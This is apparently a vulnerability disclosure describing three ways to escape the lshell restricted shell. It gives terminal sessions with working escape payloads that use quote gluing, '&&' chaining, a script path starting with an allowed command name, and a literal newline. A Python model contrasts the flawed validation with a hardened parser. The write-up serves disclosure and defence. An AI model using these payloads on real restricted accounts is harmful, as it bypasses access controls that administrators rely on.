0day vulnerabilities in lshell
lshell is a restricted shell that limits the commands and filesystem paths a user can reach. It is commonly recommended as a simpler alternative to a full chroot setup:
and so on; many sources recommend it for this purpose.
The package is available in the Ubuntu, Debian and EPEL repositories.
Code Issues
A quick look at the lshell configuration notes shows that some of the restrictions lshell introduces exist to simplify command parsing rather than to improve security: the ban on semicolons and sub-shells, for example. That makes it worth looking closely at how this parsing is actually implemented.
Reading the source code makes it clear that the launched command and its arguments are picked out by a library intended for parsing simple CLI invocations, which does not correctly handle the full syntax of shell command lines. At the same time, despite the warning in the documentation, the command is handed to /bin/sh after only a superficial validation. That validation deserves particular attention, because it rests on the assumptions that:
- the command is always a single line
- nothing inside quotes needs to be checked
There is no real syntax analysis anywhere, so these are far from the only assumptions the validation makes.
The consequences
The following scenarios allow a user to escape from such a restricted shell.
Scenario 1: exploiting quote handling and command chaining
GitHub issue
vladislav@dt1:~$ getent passwd testuser
testuser:x:1002:1003:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password:
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ ls
examples.desktop
testuser:~$ which bash
*** forbidden command: which
testuser:~$ ls'usb '
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 006: ID 046d:c05a Logitech, Inc. M90/M100 Optical Mouse
Bus 001 Device 002: ID 046d:c31c Logitech, Inc. Keyboard K120
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
testuser:~$ echo && 'bash'
testuser@dt1:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
testuser@dt1:~$ reboot --help
reboot [OPTIONS...] [ARG]
Reboot the system.
     --help      Show this help
     --halt      Halt the machine
  -p --poweroff  Switch off the machine
     --reboot    Reboot the machine
  -f --force     Force immediate halt/power-off/reboot
  -w --wtmp-only Don't halt/power-off/reboot, just write wtmp record
  -d --no-wtmp   Don't write wtmp record
     --no-wall   Don't send wall message before halt/power-off/reboot
Scenario 2: running a script from the home directory whose path begins with the name of an allowed command
GitHub issue
vladislav@dt1:~$ su - testuser
Password:
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ echo '/1.sh'
testuser@dt1:~$ cat echo/1.sh
#!/bin/bash
/bin/bash
testuser@dt1:~$
Scenario 3: using special terminal key sequences
It is enough to start the command with any allowed word, insert a line feed by pressing two keyboard shortcuts in succession (for example readline's quoted-insert, Ctrl-V followed by Ctrl-J, inserts a literal newline), and type any command you like on the new line. The validation only ever looks at the first line.
GitHub issue
vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password:
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echobash
testuser@dt1:~$ which bash
/bin/bash
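The root cause shared by the three scenarios, as an added illustration that is not lshell's own code: a small Python model of the two assumptions the validation makes (one line, quotes are opaque), a rough model of what /bin/sh actually executes for the same input, and a parse-then-execve design that never hands the line to a shell. ALLOWED is the command list printed by '?' in the sessions above; the FORBIDDEN substrings, the helper names and the payloads (including the glued-quote variant echo'/1.sh') are constructed for this demonstration.

```python
"""Model of the lshell validation flaw: added illustration, not lshell's code."""
import re
import shlex

# Allowed commands, as listed by '?' in the sessions above.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}
# Substrings a first-word filter typically bans (assumed set, for illustration).
FORBIDDEN = (";", "`", "$(")
QUOTED = re.compile(r"'[^']*'|\"[^\"]*\"")
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def naive_validate(line):
    """Approximation of the flawed check: blank out quoted text, ban a few
    substrings, and require the first word of each &&/|| chunk to be allowed.
    True means the line would be handed to /bin/sh -c."""
    unquoted = QUOTED.sub("", line)          # assumption: quotes are opaque
    if any(bad in unquoted for bad in FORBIDDEN):
        return False
    for chunk in re.split(r"&&|\|\|", unquoted):
        words = chunk.split()                # assumption: one logical line
        if words and words[0] not in ALLOWED:
            return False
    return True


def sh_would_run(line):
    """Rough model of the simple commands /bin/sh -c executes for `line`:
    split physical lines, word-split with POSIX quoting rules, and cut the
    token list at whitespace-separated && || ; | operators.  Not a full
    sh parser, but enough to show the gap between check and execution."""
    commands = []
    for physical in line.split("\n"):
        current = []
        for tok in shlex.split(physical):
            if tok in ("&&", "||", ";", "|"):
                if current:
                    commands.append(current)
                    current = []
            else:
                current.append(tok)
        if current:
            commands.append(current)
    return commands


def hardened_parse(line):
    """Parse-then-execve design: reject control characters outright, tokenize
    with POSIX quoting so a quote cannot glue a different program name onto an
    allowed word, and allowlist argv[0].  The returned argv is meant for
    execve() on a fixed binary path, never for a shell, so '&&' and friends
    become literal arguments instead of operators.  None means reject."""
    if CONTROL.search(line):                 # newline, escape sequences, NUL
        return None
    try:
        argv = shlex.split(line)
    except ValueError:                       # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    return argv


if __name__ == "__main__":
    # Constructed payloads mirroring the three escape scenarios, plus a plain
    # forbidden command and a legitimate one.
    for payload in ("ls'usb '", "echo && 'bash'", "echo'/1.sh'",
                    "echo\nbash", "bash", "ls -la"):
        print(f"{payload!r:18} naive={naive_validate(payload)!s:5} "
              f"sh runs={sh_would_run(payload)} "
              f"hardened argv={hardened_parse(payload)}")
```

naive_validate accepts every escape payload because it only ever sees an allowed first word, while sh_would_run shows the shell actually executing lsusb, bash and echo/1.sh. hardened_parse rejects the glued-quote and multi-line inputs and leaves `&&` as an inert argument, since nothing is ever passed through a shell. This is only the parsing half of a restricted shell: each allowed name still needs a fixed absolute path and the user must not control the environment the program inherits.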
The best solution
This software is far too distant from a state in which it can be used safely. The best course of action is therefore to stop using it.